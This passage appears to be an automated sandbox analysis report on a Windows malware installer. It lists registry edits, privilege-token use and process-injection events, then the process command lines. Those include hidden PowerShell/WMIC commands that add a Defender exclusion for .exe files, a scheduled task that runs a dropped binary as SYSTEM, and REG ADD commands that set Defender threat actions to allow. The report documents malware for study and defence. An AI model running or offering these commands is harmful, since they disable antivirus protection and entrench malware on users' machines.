Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d1929823-0000-0000-0000-d01200000000}\NukeOnDelete = "0" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d1929823-0000-0000-0000-d01200000000} C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2132 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe
PID 2132 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe
PID 2132 wrote to memory of 2828 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe
PID 2828 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2828 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2828 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3508 wrote to memory of 1792 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3508 wrote to memory of 1792 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 3508 wrote to memory of 1792 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1792 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1792 wrote to memory of 4936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4936 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 4936 wrote to memory of 956 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2828 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2828 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2828 wrote to memory of 1776 N/A C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3016 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3016 wrote to memory of 3376 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3376 wrote to memory of 4944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 4944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 4944 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4944 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4944 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4944 wrote to memory of 1416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1216 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3076 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1648 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3904 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2336 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 2640 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 3392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 5072 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4972 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4972 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4972 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1836 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1836 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 1836 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4580 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe

"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe

.\Install.exe /AdidysikD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe\" Oz /Rhsite_iddhd 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe Oz /Rhsite_iddhd 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD 